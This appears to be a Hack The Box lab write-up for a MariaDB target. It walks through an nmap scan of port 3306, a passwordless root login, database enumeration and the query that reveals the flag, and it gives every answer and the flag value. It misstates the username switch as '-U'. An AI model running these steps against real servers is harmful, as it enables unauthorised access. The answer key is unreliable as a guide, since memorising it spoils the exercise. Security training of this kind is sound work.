During our scan, which port do we find serving MySQL?
3306 1┌─[us-starting-point-vip-1-dhcp]─[10.10.14.28]─[leewookb@htb-0x7zvm1bat]─[~]
2└──╼ [★]$ nmap -sC -sV 10.129.50.55 -p-
3Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 23:56 CDT
4Nmap scan report for 10.129.50.55
5Host is up (0.0084s latency).
6Not shown: 65534 closed tcp ports (reset)
7PORT STATE SERVICE VERSION
83306/tcp open mysql?
9| mysql-info:
10| Protocol: 10
11| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
12| Thread ID: 66
13| Capabilities flags: 63486
14| Some Capabilities: Speaks41ProtocolOld, Support41Auth, SupportsTransactions, SupportsCompression, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, ConnectWithDatabase, FoundRows, SupportsLoadDataLocal, ODBCClient, DontAllowDatabaseTableColumn, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
15| Status: Autocommit
16| Salt: 6'\|}}|xdny7D0ay_OOz
17|_ Auth Plugin Name: mysql_native_password
18
19Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
20Nmap done: 1 IP address (1 host up) scanned in 204.84 secondsWhat community-developed MySQL version is the target running?
MariaDB1| mysql-info:
2| Protocol: 10
3| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
4| Thread ID: 66
5| Capabilities flags: 63486When using the MySQL command line client, what switch do we need to use in order to specify a login username?
-UThe option could be found by the mysql --help command
Which username allows us to log into this MariaDB instance without providing a password?
rootI attempted to login as root without password and it was accepted.
mysql -h {target IP address} -u {username}
1┌─[us-starting-point-vip-1-dhcp]─[10.10.14.28]─[leewookb@htb-0x7zvm1bat]─[~]
2└──╼ [★]$ mysql -h 10.129.50.55 -u root
3Welcome to the MariaDB monitor. Commands end with ; or \g.
4Your MariaDB connection id is 74
5Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
6
7Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
8
9Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
10
11MariaDB [(none)]>In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
** the asterisk symbol is used to display everything (all columns) inside a table.
For example, SELECT * FROM {table_name}
In SQL, what symbol do we need to end each query with?
;in SQL, we specify ;, the semicolon to end each query, just like we end every line with the semicolon when programming in Javascript.
There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that’s unique to this host?
htbSHOW DATABSES command listed all the databases in the MySQL instance and htb is the unique one to the host.
1MariaDB [(none)]> SHOW DATABASES;
2+--------------------+
3| Database |
4+--------------------+
5| htb |
6| information_schema |
7| mysql |
8| performance_schema |
9+--------------------+Submit root flag
7b4bec00d1a39e3dd4e021ec3d915da8since I know the database that I’m interested in is the htb database, I ran use htb command to change the database to htb.
Then listed the tables belonged to the db by show tables
1MariaDB [(none)]> use htb
2Reading table information for completion of table and column names
3You can turn off this feature to get a quicker startup with -A
4
5Database changed
6MariaDB [htb]> show tables;
7+---------------+
8| Tables_in_htb |
9+---------------+
10| config |
11| users |
12+---------------+
132 rows in set (0.009 sec)To list everything in the config table, I ran show * from config and there was the flag.
1MariaDB [htb]> select * from config;
2+----+-----------------------+----------------------------------+
3| id | name | value |
4+----+-----------------------+----------------------------------+
5| 1 | timeout | 60s |
6| 2 | security | default |
7| 3 | auto_logon | false |
8| 4 | max_size | 2M |
9| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
10| 6 | enable_uploads | false |
11| 7 | authentication_method | radius |
12+----+-----------------------+----------------------------------+
137 rows in set (0.009 sec)